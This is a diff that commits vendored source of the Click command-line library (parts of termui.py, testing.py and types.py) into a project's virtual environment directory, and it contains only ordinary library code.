particular, + ``xdg-open`` on Linux does not block. + :param locate: if this is set to `True` then instead of launching the + application associated with the URL it will attempt to + launch a file manager with the file located. This + might have weird effects if the URL does not point to + the filesystem. + """ + from ._termui_impl import open_url + + return open_url(url, wait=wait, locate=locate) + + +# If this is provided, getchar() calls into this instead. This is used +# for unittesting purposes. +_getchar: t.Optional[t.Callable[[bool], str]] = None + + +def getchar(echo: bool = False) -> str: + """Fetches a single character from the terminal and returns it. This + will always return a unicode character and under certain rare + circumstances this might return more than one character. The + situations which more than one character is returned is when for + whatever reason multiple characters end up in the terminal buffer or + standard input was not actually a terminal. + + Note that this will always read from the terminal, even if something + is piped into the standard input. + + Note for Windows: in rare cases when typing non-ASCII characters, this + function might wait for a second character and then return both at once. + This is because certain Unicode characters look like special-key markers. + + .. versionadded:: 2.0 + + :param echo: if set to `True`, the character read will also show up on + the terminal. The default is to not show it. + """ + global _getchar + + if _getchar is None: + from ._termui_impl import getchar as f + + _getchar = f + + return _getchar(echo) + + +def raw_terminal() -> t.ContextManager[int]: + from ._termui_impl import raw_terminal as f + + return f() + + +def pause(info: t.Optional[str] = None, err: bool = False) -> None: + """This command stops execution and waits for the user to press any + key to continue. This is similar to the Windows batch "pause" + command. If the program is not run through a terminal, this command + will instead do nothing. + + .. versionadded:: 2.0 + + .. versionadded:: 4.0 + Added the `err` parameter. + + :param info: The message to print before pausing. Defaults to + ``"Press any key to continue..."``. + :param err: if set to message goes to ``stderr`` instead of + ``stdout``, the same as with echo. + """ + if not isatty(sys.stdin) or not isatty(sys.stdout): + return + + if info is None: + info = _("Press any key to continue...") + + try: + if info: + echo(info, nl=False, err=err) + try: + getchar() + except (KeyboardInterrupt, EOFError): + pass + finally: + if info: + echo(err=err) diff --git a/env/Lib/site-packages/click/testing.py b/env/Lib/site-packages/click/testing.py new file mode 100644 index 00000000..e0df0d2a --- /dev/null +++ b/env/Lib/site-packages/click/testing.py @@ -0,0 +1,479 @@ +import contextlib +import io +import os +import shlex +import shutil +import sys +import tempfile +import typing as t +from types import TracebackType + +from . import formatting +from . import termui +from . import utils +from ._compat import _find_binary_reader + +if t.TYPE_CHECKING: + from .core import BaseCommand + + +class EchoingStdin: + def __init__(self, input: t.BinaryIO, output: t.BinaryIO) -> None: + self._input = input + self._output = output + self._paused = False + + def __getattr__(self, x: str) -> t.Any: + return getattr(self._input, x) + + def _echo(self, rv: bytes) -> bytes: + if not self._paused: + self._output.write(rv) + + return rv + + def read(self, n: int = -1) -> bytes: + return self._echo(self._input.read(n)) + + def read1(self, n: int = -1) -> bytes: + return self._echo(self._input.read1(n)) # type: ignore + + def readline(self, n: int = -1) -> bytes: + return self._echo(self._input.readline(n)) + + def readlines(self) -> t.List[bytes]: + return [self._echo(x) for x in self._input.readlines()] + + def __iter__(self) -> t.Iterator[bytes]: + return iter(self._echo(x) for x in self._input) + + def __repr__(self) -> str: + return repr(self._input) + + +@contextlib.contextmanager +def _pause_echo(stream: t.Optional[EchoingStdin]) -> t.Iterator[None]: + if stream is None: + yield + else: + stream._paused = True + yield + stream._paused = False + + +class _NamedTextIOWrapper(io.TextIOWrapper): + def __init__( + self, buffer: t.BinaryIO, name: str, mode: str, **kwargs: t.Any + ) -> None: + super().__init__(buffer, **kwargs) + self._name = name + self._mode = mode + + @property + def name(self) -> str: + return self._name + + @property + def mode(self) -> str: + return self._mode + + +def make_input_stream( + input: t.Optional[t.Union[str, bytes, t.IO[t.Any]]], charset: str +) -> t.BinaryIO: + # Is already an input stream. + if hasattr(input, "read"): + rv = _find_binary_reader(t.cast(t.IO[t.Any], input)) + + if rv is not None: + return rv + + raise TypeError("Could not find binary reader for input stream.") + + if input is None: + input = b"" + elif isinstance(input, str): + input = input.encode(charset) + + return io.BytesIO(input) + + +class Result: + """Holds the captured result of an invoked CLI script.""" + + def __init__( + self, + runner: "CliRunner", + stdout_bytes: bytes, + stderr_bytes: t.Optional[bytes], + return_value: t.Any, + exit_code: int, + exception: t.Optional[BaseException], + exc_info: t.Optional[ + t.Tuple[t.Type[BaseException], BaseException, TracebackType] + ] = None, + ): + #: The runner that created the result + self.runner = runner + #: The standard output as bytes. + self.stdout_bytes = stdout_bytes + #: The standard error as bytes, or None if not available + self.stderr_bytes = stderr_bytes + #: The value returned from the invoked command. + #: + #: .. versionadded:: 8.0 + self.return_value = return_value + #: The exit code as integer. + self.exit_code = exit_code + #: The exception that happened if one did. + self.exception = exception + #: The traceback + self.exc_info = exc_info + + @property + def output(self) -> str: + """The (standard) output as unicode string.""" + return self.stdout + + @property + def stdout(self) -> str: + """The standard output as unicode string.""" + return self.stdout_bytes.decode(self.runner.charset, "replace").replace( + "\r\n", "\n" + ) + + @property + def stderr(self) -> str: + """The standard error as unicode string.""" + if self.stderr_bytes is None: + raise ValueError("stderr not separately captured") + return self.stderr_bytes.decode(self.runner.charset, "replace").replace( + "\r\n", "\n" + ) + + def __repr__(self) -> str: + exc_str = repr(self.exception) if self.exception else "okay" + return f"<{type(self).__name__} {exc_str}>" + + +class CliRunner: + """The CLI runner provides functionality to invoke a Click command line + script for unittesting purposes in a isolated environment. This only + works in single-threaded systems without any concurrency as it changes the + global interpreter state. + + :param charset: the character set for the input and output data. + :param env: a dictionary with environment variables for overriding. + :param echo_stdin: if this is set to `True`, then reading from stdin writes + to stdout. This is useful for showing examples in + some circumstances. Note that regular prompts + will automatically echo the input. + :param mix_stderr: if this is set to `False`, then stdout and stderr are + preserved as independent streams. This is useful for + Unix-philosophy apps that have predictable stdout and + noisy stderr, such that each may be measured + independently + """ + + def __init__( + self, + charset: str = "utf-8", + env: t.Optional[t.Mapping[str, t.Optional[str]]] = None, + echo_stdin: bool = False, + mix_stderr: bool = True, + ) -> None: + self.charset = charset + self.env: t.Mapping[str, t.Optional[str]] = env or {} + self.echo_stdin = echo_stdin + self.mix_stderr = mix_stderr + + def get_default_prog_name(self, cli: "BaseCommand") -> str: + """Given a command object it will return the default program name + for it. The default is the `name` attribute or ``"root"`` if not + set. + """ + return cli.name or "root" + + def make_env( + self, overrides: t.Optional[t.Mapping[str, t.Optional[str]]] = None + ) -> t.Mapping[str, t.Optional[str]]: + """Returns the environment overrides for invoking a script.""" + rv = dict(self.env) + if overrides: + rv.update(overrides) + return rv + + @contextlib.contextmanager + def isolation( + self, + input: t.Optional[t.Union[str, bytes, t.IO[t.Any]]] = None, + env: t.Optional[t.Mapping[str, t.Optional[str]]] = None, + color: bool = False, + ) -> t.Iterator[t.Tuple[io.BytesIO, t.Optional[io.BytesIO]]]: + """A context manager that sets up the isolation for invoking of a + command line tool. This sets up stdin with the given input data + and `os.environ` with the overrides from the given dictionary. + This also rebinds some internals in Click to be mocked (like the + prompt functionality). + + This is automatically done in the :meth:`invoke` method. + + :param input: the input stream to put into sys.stdin. + :param env: the environment overrides as dictionary. + :param color: whether the output should contain color codes. The + application can still override this explicitly. + + .. versionchanged:: 8.0 + ``stderr`` is opened with ``errors="backslashreplace"`` + instead of the default ``"strict"``. + + .. versionchanged:: 4.0 + Added the ``color`` parameter. + """ + bytes_input = make_input_stream(input, self.charset) + echo_input = None + + old_stdin = sys.stdin + old_stdout = sys.stdout + old_stderr = sys.stderr + old_forced_width = formatting.FORCED_WIDTH + formatting.FORCED_WIDTH = 80 + + env = self.make_env(env) + + bytes_output = io.BytesIO() + + if self.echo_stdin: + bytes_input = echo_input = t.cast( + t.BinaryIO, EchoingStdin(bytes_input, bytes_output) + ) + + sys.stdin = text_input = _NamedTextIOWrapper( + bytes_input, encoding=self.charset, name="", mode="r" + ) + + if self.echo_stdin: + # Force unbuffered reads, otherwise TextIOWrapper reads a + # large chunk which is echoed early. + text_input._CHUNK_SIZE = 1 # type: ignore + + sys.stdout = _NamedTextIOWrapper( + bytes_output, encoding=self.charset, name="", mode="w" + ) + + bytes_error = None + if self.mix_stderr: + sys.stderr = sys.stdout + else: + bytes_error = io.BytesIO() + sys.stderr = _NamedTextIOWrapper( + bytes_error, + encoding=self.charset, + name="", + mode="w", + errors="backslashreplace", + ) + + @_pause_echo(echo_input) # type: ignore + def visible_input(prompt: t.Optional[str] = None) -> str: + sys.stdout.write(prompt or "") + val = text_input.readline().rstrip("\r\n") + sys.stdout.write(f"{val}\n") + sys.stdout.flush() + return val + + @_pause_echo(echo_input) # type: ignore + def hidden_input(prompt: t.Optional[str] = None) -> str: + sys.stdout.write(f"{prompt or ''}\n") + sys.stdout.flush() + return text_input.readline().rstrip("\r\n") + + @_pause_echo(echo_input) # type: ignore + def _getchar(echo: bool) -> str: + char = sys.stdin.read(1) + + if echo: + sys.stdout.write(char) + + sys.stdout.flush() + return char + + default_color = color + + def should_strip_ansi( + stream: t.Optional[t.IO[t.Any]] = None, color: t.Optional[bool] = None + ) -> bool: + if color is None: + return not default_color + return not color + + old_visible_prompt_func = termui.visible_prompt_func + old_hidden_prompt_func = termui.hidden_prompt_func + old__getchar_func = termui._getchar + old_should_strip_ansi = utils.should_strip_ansi # type: ignore + termui.visible_prompt_func = visible_input + termui.hidden_prompt_func = hidden_input + termui._getchar = _getchar + utils.should_strip_ansi = should_strip_ansi # type: ignore + + old_env = {} + try: + for key, value in env.items(): + old_env[key] = os.environ.get(key) + if value is None: + try: + del os.environ[key] + except Exception: + pass + else: + os.environ[key] = value + yield (bytes_output, bytes_error) + finally: + for key, value in old_env.items(): + if value is None: + try: + del os.environ[key] + except Exception: + pass + else: + os.environ[key] = value + sys.stdout = old_stdout + sys.stderr = old_stderr + sys.stdin = old_stdin + termui.visible_prompt_func = old_visible_prompt_func + termui.hidden_prompt_func = old_hidden_prompt_func + termui._getchar = old__getchar_func + utils.should_strip_ansi = old_should_strip_ansi # type: ignore + formatting.FORCED_WIDTH = old_forced_width + + def invoke( + self, + cli: "BaseCommand", + args: t.Optional[t.Union[str, t.Sequence[str]]] = None, + input: t.Optional[t.Union[str, bytes, t.IO[t.Any]]] = None, + env: t.Optional[t.Mapping[str, t.Optional[str]]] = None, + catch_exceptions: bool = True, + color: bool = False, + **extra: t.Any, + ) -> Result: + """Invokes a command in an isolated environment. The arguments are + forwarded directly to the command line script, the `extra` keyword + arguments are passed to the :meth:`~clickpkg.Command.main` function of + the command. + + This returns a :class:`Result` object. + + :param cli: the command to invoke + :param args: the arguments to invoke. It may be given as an iterable + or a string. When given as string it will be interpreted + as a Unix shell command. More details at + :func:`shlex.split`. + :param input: the input data for `sys.stdin`. + :param env: the environment overrides. + :param catch_exceptions: Whether to catch any other exceptions than + ``SystemExit``. + :param extra: the keyword arguments to pass to :meth:`main`. + :param color: whether the output should contain color codes. The + application can still override this explicitly. + + .. versionchanged:: 8.0 + The result object has the ``return_value`` attribute with + the value returned from the invoked command. + + .. versionchanged:: 4.0 + Added the ``color`` parameter. + + .. versionchanged:: 3.0 + Added the ``catch_exceptions`` parameter. + + .. versionchanged:: 3.0 + The result object has the ``exc_info`` attribute with the + traceback if available. + """ + exc_info = None + with self.isolation(input=input, env=env, color=color) as outstreams: + return_value = None + exception: t.Optional[BaseException] = None + exit_code = 0 + + if isinstance(args, str): + args = shlex.split(args) + + try: + prog_name = extra.pop("prog_name") + except KeyError: + prog_name = self.get_default_prog_name(cli) + + try: + return_value = cli.main(args=args or (), prog_name=prog_name, **extra) + except SystemExit as e: + exc_info = sys.exc_info() + e_code = t.cast(t.Optional[t.Union[int, t.Any]], e.code) + + if e_code is None: + e_code = 0 + + if e_code != 0: + exception = e + + if not isinstance(e_code, int): + sys.stdout.write(str(e_code)) + sys.stdout.write("\n") + e_code = 1 + + exit_code = e_code + + except Exception as e: + if not catch_exceptions: + raise + exception = e + exit_code = 1 + exc_info = sys.exc_info() + finally: + sys.stdout.flush() + stdout = outstreams[0].getvalue() + if self.mix_stderr: + stderr = None + else: + stderr = outstreams[1].getvalue() # type: ignore + + return Result( + runner=self, + stdout_bytes=stdout, + stderr_bytes=stderr, + return_value=return_value, + exit_code=exit_code, + exception=exception, + exc_info=exc_info, # type: ignore + ) + + @contextlib.contextmanager + def isolated_filesystem( + self, temp_dir: t.Optional[t.Union[str, "os.PathLike[str]"]] = None + ) -> t.Iterator[str]: + """A context manager that creates a temporary directory and + changes the current working directory to it. This isolates tests + that affect the contents of the CWD to prevent them from + interfering with each other. + + :param temp_dir: Create the temporary directory under this + directory. If given, the created directory is not removed + when exiting. + + .. versionchanged:: 8.0 + Added the ``temp_dir`` parameter. + """ + cwd = os.getcwd() + dt = tempfile.mkdtemp(dir=temp_dir) + os.chdir(dt) + + try: + yield dt + finally: + os.chdir(cwd) + + if temp_dir is None: + try: + shutil.rmtree(dt) + except OSError: # noqa: B014 + pass diff --git a/env/Lib/site-packages/click/types.py b/env/Lib/site-packages/click/types.py new file mode 100644 index 00000000..2b1d1797 --- /dev/null +++ b/env/Lib/site-packages/click/types.py @@ -0,0 +1,1089 @@ +import os +import stat +import sys +import typing as t +from datetime import datetime +from gettext import gettext as _ +from gettext import ngettext + +from ._compat import _get_argv_encoding +from ._compat import open_stream +from .exceptions import BadParameter +from .utils import format_filename +from .utils import LazyFile +from .utils import safecall + +if t.TYPE_CHECKING: + import typing_extensions as te + from .core import Context + from .core import Parameter + from .shell_completion import CompletionItem + + +class ParamType: + """Represents the type of a parameter. Validates and converts values + from the command line or Python into the correct type. + + To implement a custom type, subclass and implement at least the + following: + + - The :attr:`name` class attribute must be set. + - Calling an instance of the type with ``None`` must return + ``None``. This is already implemented by default. + - :meth:`convert` must convert string values to the correct type. + - :meth:`convert` must accept values that are already the correct + type. + - It must be able to convert a value if the ``ctx`` and ``param`` + arguments are ``None``. This can occur when converting prompt + input. + """ + + is_composite: t.ClassVar[bool] = False + arity: t.ClassVar[int] = 1 + + #: the descriptive name of this type + name: str + + #: if a list of this type is expected and the value is pulled from a + #: string environment variable, this is what splits it up. `None` + #: means any whitespace. For all parameters the general rule is that + #: whitespace splits them up. The exception are paths and files which + #: are split by ``os.path.pathsep`` by default (":" on Unix and ";" on + #: Windows). + envvar_list_splitter: t.ClassVar[t.Optional[str]] = None + + def to_info_dict(self) -> t.Dict[str, t.Any]: + """Gather information that could be useful for a tool generating + user-facing documentation. + + Use :meth:`click.Context.to_info_dict` to traverse the entire + CLI structure. + + .. versionadded:: 8.0 + """ + # The class name without the "ParamType" suffix. + param_type = type(self).__name__.partition("ParamType")[0] + param_type = param_type.partition("ParameterType")[0] + + # Custom subclasses might not remember to set a name. + if hasattr(self, "name"): + name = self.name + else: + name = param_type + + return {"param_type": param_type, "name": name} + + def __call__( + self, + value: t.Any, + param: t.Optional["Parameter"] = None, + ctx: t.Optional["Context"] = None, + ) -> t.Any: + if value is not None: + return self.convert(value, param, ctx) + + def get_metavar(self, param: "Parameter") -> t.Optional[str]: + """Returns the metavar default for this param if it provides one.""" + + def get_missing_message(self, param: "Parameter") -> t.Optional[str]: + """Optionally might return extra information about a missing + parameter. + + .. versionadded:: 2.0 + """ + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + """Convert the value to the correct type. This is not called if + the value is ``None`` (the missing value). + + This must accept string values from the command line, as well as + values that are already the correct type. It may also convert + other compatible types. + + The ``param`` and ``ctx`` arguments may be ``None`` in certain + situations, such as when converting prompt input. + + If the value cannot be converted, call :meth:`fail` with a + descriptive message. + + :param value: The value to convert. + :param param: The parameter that is using this type to convert + its value. May be ``None``. + :param ctx: The current context that arrived at this value. May + be ``None``. + """ + return value + + def split_envvar_value(self, rv: str) -> t.Sequence[str]: + """Given a value from an environment variable this splits it up + into small chunks depending on the defined envvar list splitter. + + If the splitter is set to `None`, which means that whitespace splits, + then leading and trailing whitespace is ignored. Otherwise, leading + and trailing splitters usually lead to empty items being included. + """ + return (rv or "").split(self.envvar_list_splitter) + + def fail( + self, + message: str, + param: t.Optional["Parameter"] = None, + ctx: t.Optional["Context"] = None, + ) -> "t.NoReturn": + """Helper method to fail with an invalid value message.""" + raise BadParameter(message, ctx=ctx, param=param) + + def shell_complete( + self, ctx: "Context", param: "Parameter", incomplete: str + ) -> t.List["CompletionItem"]: + """Return a list of + :class:`~click.shell_completion.CompletionItem` objects for the + incomplete value. Most types do not provide completions, but + some do, and this allows custom types to provide custom + completions as well. + + :param ctx: Invocation context for this command. + :param param: The parameter that is requesting completion. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + return [] + + +class CompositeParamType(ParamType): + is_composite = True + + @property + def arity(self) -> int: # type: ignore + raise NotImplementedError() + + +class FuncParamType(ParamType): + def __init__(self, func: t.Callable[[t.Any], t.Any]) -> None: + self.name: str = func.__name__ + self.func = func + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict["func"] = self.func + return info_dict + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + try: + return self.func(value) + except ValueError: + try: + value = str(value) + except UnicodeError: + value = value.decode("utf-8", "replace") + + self.fail(value, param, ctx) + + +class UnprocessedParamType(ParamType): + name = "text" + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + return value + + def __repr__(self) -> str: + return "UNPROCESSED" + + +class StringParamType(ParamType): + name = "text" + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + if isinstance(value, bytes): + enc = _get_argv_encoding() + try: + value = value.decode(enc) + except UnicodeError: + fs_enc = sys.getfilesystemencoding() + if fs_enc != enc: + try: + value = value.decode(fs_enc) + except UnicodeError: + value = value.decode("utf-8", "replace") + else: + value = value.decode("utf-8", "replace") + return value + return str(value) + + def __repr__(self) -> str: + return "STRING" + + +class Choice(ParamType): + """The choice type allows a value to be checked against a fixed set + of supported values. All of these values have to be strings. + + You should only pass a list or tuple of choices. Other iterables + (like generators) may lead to surprising results. + + The resulting value will always be one of the originally passed choices + regardless of ``case_sensitive`` or any ``ctx.token_normalize_func`` + being specified. + + See :ref:`choice-opts` for an example. + + :param case_sensitive: Set to false to make choices case + insensitive. Defaults to true. + """ + + name = "choice" + + def __init__(self, choices: t.Sequence[str], case_sensitive: bool = True) -> None: + self.choices = choices + self.case_sensitive = case_sensitive + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict["choices"] = self.choices + info_dict["case_sensitive"] = self.case_sensitive + return info_dict + + def get_metavar(self, param: "Parameter") -> str: + choices_str = "|".join(self.choices) + + # Use curly braces to indicate a required argument. + if param.required and param.param_type_name == "argument": + return f"{{{choices_str}}}" + + # Use square braces to indicate an option or optional argument. + return f"[{choices_str}]" + + def get_missing_message(self, param: "Parameter") -> str: + return _("Choose from:\n\t{choices}").format(choices=",\n\t".join(self.choices)) + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + # Match through normalization and case sensitivity + # first do token_normalize_func, then lowercase + # preserve original `value` to produce an accurate message in + # `self.fail` + normed_value = value + normed_choices = {choice: choice for choice in self.choices} + + if ctx is not None and ctx.token_normalize_func is not None: + normed_value = ctx.token_normalize_func(value) + normed_choices = { + ctx.token_normalize_func(normed_choice): original + for normed_choice, original in normed_choices.items() + } + + if not self.case_sensitive: + normed_value = normed_value.casefold() + normed_choices = { + normed_choice.casefold(): original + for normed_choice, original in normed_choices.items() + } + + if normed_value in normed_choices: + return normed_choices[normed_value] + + choices_str = ", ".join(map(repr, self.choices)) + self.fail( + ngettext( + "{value!r} is not {choice}.", + "{value!r} is not one of {choices}.", + len(self.choices), + ).format(value=value, choice=choices_str, choices=choices_str), + param, + ctx, + ) + + def __repr__(self) -> str: + return f"Choice({list(self.choices)})" + + def shell_complete( + self, ctx: "Context", param: "Parameter", incomplete: str + ) -> t.List["CompletionItem"]: + """Complete choices that start with the incomplete value. + + :param ctx: Invocation context for this command. + :param param: The parameter that is requesting completion. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + str_choices = map(str, self.choices) + + if self.case_sensitive: + matched = (c for c in str_choices if c.startswith(incomplete)) + else: + incomplete = incomplete.lower() + matched = (c for c in str_choices if c.lower().startswith(incomplete)) + + return [CompletionItem(c) for c in matched] + + +class DateTime(ParamType): + """The DateTime type converts date strings into `datetime` objects. + + The format strings which are checked are configurable, but default to some + common (non-timezone aware) ISO 8601 formats. + + When specifying *DateTime* formats, you should only pass a list or a tuple. + Other iterables, like generators, may lead to surprising results. + + The format strings are processed using ``datetime.strptime``, and this + consequently defines the format strings which are allowed. + + Parsing is tried using each format, in order, and the first format which + parses successfully is used. + + :param formats: A list or tuple of date format strings, in the order in + which they should be tried. Defaults to + ``'%Y-%m-%d'``, ``'%Y-%m-%dT%H:%M:%S'``, + ``'%Y-%m-%d %H:%M:%S'``. + """ + + name = "datetime" + + def __init__(self, formats: t.Optional[t.Sequence[str]] = None): + self.formats: t.Sequence[str] = formats or [ + "%Y-%m-%d", + "%Y-%m-%dT%H:%M:%S", + "%Y-%m-%d %H:%M:%S", + ] + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict["formats"] = self.formats + return info_dict + + def get_metavar(self, param: "Parameter") -> str: + return f"[{'|'.join(self.formats)}]" + + def _try_to_convert_date(self, value: t.Any, format: str) -> t.Optional[datetime]: + try: + return datetime.strptime(value, format) + except ValueError: + return None + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + if isinstance(value, datetime): + return value + + for format in self.formats: + converted = self._try_to_convert_date(value, format) + + if converted is not None: + return converted + + formats_str = ", ".join(map(repr, self.formats)) + self.fail( + ngettext( + "{value!r} does not match the format {format}.", + "{value!r} does not match the formats {formats}.", + len(self.formats), + ).format(value=value, format=formats_str, formats=formats_str), + param, + ctx, + ) + + def __repr__(self) -> str: + return "DateTime" + + +class _NumberParamTypeBase(ParamType): + _number_class: t.ClassVar[t.Type[t.Any]] + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + try: + return self._number_class(value) + except ValueError: + self.fail( + _("{value!r} is not a valid {number_type}.").format( + value=value, number_type=self.name + ), + param, + ctx, + ) + + +class _NumberRangeBase(_NumberParamTypeBase): + def __init__( + self, + min: t.Optional[float] = None, + max: t.Optional[float] = None, + min_open: bool = False, + max_open: bool = False, + clamp: bool = False, + ) -> None: + self.min = min + self.max = max + self.min_open = min_open + self.max_open = max_open + self.clamp = clamp + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict.update( + min=self.min, + max=self.max, + min_open=self.min_open, + max_open=self.max_open, + clamp=self.clamp, + ) + return info_dict + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + import operator + + rv = super().convert(value, param, ctx) + lt_min: bool = self.min is not None and ( + operator.le if self.min_open else operator.lt + )(rv, self.min) + gt_max: bool = self.max is not None and ( + operator.ge if self.max_open else operator.gt + )(rv, self.max) + + if self.clamp: + if lt_min: + return self._clamp(self.min, 1, self.min_open) # type: ignore + + if gt_max: + return self._clamp(self.max, -1, self.max_open) # type: ignore + + if lt_min or gt_max: + self.fail( + _("{value} is not in the range {range}.").format( + value=rv, range=self._describe_range() + ), + param, + ctx, + ) + + return rv + + def _clamp(self, bound: float, dir: "te.Literal[1, -1]", open: bool) -> float: + """Find the valid value to clamp to bound in the given + direction. + + :param bound: The boundary value. + :param dir: 1 or -1 indicating the direction to move. + :param open: If true, the range does not include the bound. + """ + raise NotImplementedError + + def _describe_range(self) -> str: + """Describe the range for use in help text.""" + if self.min is None: + op = "<" if self.max_open else "<=" + return f"x{op}{self.max}" + + if self.max is None: + op = ">" if self.min_open else ">=" + return f"x{op}{self.min}" + + lop = "<" if self.min_open else "<=" + rop = "<" if self.max_open else "<=" + return f"{self.min}{lop}x{rop}{self.max}" + + def __repr__(self) -> str: + clamp = " clamped" if self.clamp else "" + return f"<{type(self).__name__} {self._describe_range()}{clamp}>" + + +class IntParamType(_NumberParamTypeBase): + name = "integer" + _number_class = int + + def __repr__(self) -> str: + return "INT" + + +class IntRange(_NumberRangeBase, IntParamType): + """Restrict an :data:`click.INT` value to a range of accepted + values. See :ref:`ranges`. + + If ``min`` or ``max`` are not passed, any value is accepted in that + direction. If ``min_open`` or ``max_open`` are enabled, the + corresponding boundary is not included in the range. + + If ``clamp`` is enabled, a value outside the range is clamped to the + boundary instead of failing. + + .. versionchanged:: 8.0 + Added the ``min_open`` and ``max_open`` parameters. + """ + + name = "integer range" + + def _clamp( # type: ignore + self, bound: int, dir: "te.Literal[1, -1]", open: bool + ) -> int: + if not open: + return bound + + return bound + dir + + +class FloatParamType(_NumberParamTypeBase): + name = "float" + _number_class = float + + def __repr__(self) -> str: + return "FLOAT" + + +class FloatRange(_NumberRangeBase, FloatParamType): + """Restrict a :data:`click.FLOAT` value to a range of accepted + values. See :ref:`ranges`. + + If ``min`` or ``max`` are not passed, any value is accepted in that + direction. If ``min_open`` or ``max_open`` are enabled, the + corresponding boundary is not included in the range. + + If ``clamp`` is enabled, a value outside the range is clamped to the + boundary instead of failing. This is not supported if either + boundary is marked ``open``. + + .. versionchanged:: 8.0 + Added the ``min_open`` and ``max_open`` parameters. + """ + + name = "float range" + + def __init__( + self, + min: t.Optional[float] = None, + max: t.Optional[float] = None, + min_open: bool = False, + max_open: bool = False, + clamp: bool = False, + ) -> None: + super().__init__( + min=min, max=max, min_open=min_open, max_open=max_open, clamp=clamp + ) + + if (min_open or max_open) and clamp: + raise TypeError("Clamping is not supported for open bounds.") + + def _clamp(self, bound: float, dir: "te.Literal[1, -1]", open: bool) -> float: + if not open: + return bound + + # Could use Python 3.9's math.nextafter here, but clamping an + # open float range doesn't seem to be particularly useful. It's + # left up to the user to write a callback to do it if needed. + raise RuntimeError("Clamping is not supported for open bounds.") + + +class BoolParamType(ParamType): + name = "boolean" + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + if value in {False, True}: + return bool(value) + + norm = value.strip().lower() + + if norm in {"1", "true", "t", "yes", "y", "on"}: + return True + + if norm in {"0", "false", "f", "no", "n", "off"}: + return False + + self.fail( + _("{value!r} is not a valid boolean.").format(value=value), param, ctx + ) + + def __repr__(self) -> str: + return "BOOL" + + +class UUIDParameterType(ParamType): + name = "uuid" + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + import uuid + + if isinstance(value, uuid.UUID): + return value + + value = value.strip() + + try: + return uuid.UUID(value) + except ValueError: + self.fail( + _("{value!r} is not a valid UUID.").format(value=value), param, ctx + ) + + def __repr__(self) -> str: + return "UUID" + + +class File(ParamType): + """Declares a parameter to be a file for reading or writing. The file + is automatically closed once the context tears down (after the command + finished working). + + Files can be opened for reading or writing. The special value ``-`` + indicates stdin or stdout depending on the mode. + + By default, the file is opened for reading text data, but it can also be + opened in binary mode or for writing. The encoding parameter can be used + to force a specific encoding. + + The `lazy` flag controls if the file should be opened immediately or upon + first IO. The default is to be non-lazy for standard input and output + streams as well as files opened for reading, `lazy` otherwise. When opening a + file lazily for reading, it is still opened temporarily for validation, but + will not be held open until first IO. lazy is mainly useful when opening + for writing to avoid creating the file until it is needed. + + Starting with Click 2.0, files can also be opened atomically in which + case all writes go into a separate file in the same folder and upon + completion the file will be moved over to the original location. This + is useful if a file regularly read by other users is modified. + + See :ref:`file-args` for more information. + """ + + name = "filename" + envvar_list_splitter: t.ClassVar[str] = os.path.pathsep + + def __init__( + self, + mode: str = "r", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", + lazy: t.Optional[bool] = None, + atomic: bool = False, + ) -> None: + self.mode = mode + self.encoding = encoding + self.errors = errors + self.lazy = lazy + self.atomic = atomic + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict.update(mode=self.mode, encoding=self.encoding) + return info_dict + + def resolve_lazy_flag(self, value: "t.Union[str, os.PathLike[str]]") -> bool: + if self.lazy is not None: + return self.lazy + if os.fspath(value) == "-": + return False + elif "w" in self.mode: + return True + return False + + def convert( + self, + value: t.Union[str, "os.PathLike[str]", t.IO[t.Any]], + param: t.Optional["Parameter"], + ctx: t.Optional["Context"], + ) -> t.IO[t.Any]: + if _is_file_like(value): + return value + + value = t.cast("t.Union[str, os.PathLike[str]]", value) + + try: + lazy = self.resolve_lazy_flag(value) + + if lazy: + lf = LazyFile( + value, self.mode, self.encoding, self.errors, atomic=self.atomic + ) + + if ctx is not None: + ctx.call_on_close(lf.close_intelligently) + + return t.cast(t.IO[t.Any], lf) + + f, should_close = open_stream( + value, self.mode, self.encoding, self.errors, atomic=self.atomic + ) + + # If a context is provided, we automatically close the file + # at the end of the context execution (or flush out). If a + # context does not exist, it's the caller's responsibility to + # properly close the file. This for instance happens when the + # type is used with prompts. + if ctx is not None: + if should_close: + ctx.call_on_close(safecall(f.close)) + else: + ctx.call_on_close(safecall(f.flush)) + + return f + except OSError as e: # noqa: B014 + self.fail(f"'{format_filename(value)}': {e.strerror}", param, ctx) + + def shell_complete( + self, ctx: "Context", param: "Parameter", incomplete: str + ) -> t.List["CompletionItem"]: + """Return a special completion marker that tells the completion + system to use the shell to provide file path completions. + + :param ctx: Invocation context for this command. + :param param: The parameter that is requesting completion. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + return [CompletionItem(incomplete, type="file")] + + +def _is_file_like(value: t.Any) -> "te.TypeGuard[t.IO[t.Any]]": + return hasattr(value, "read") or hasattr(value, "write") + + +class Path(ParamType): + """The ``Path`` type is similar to the :class:`File` type, but + returns the filename instead of an open 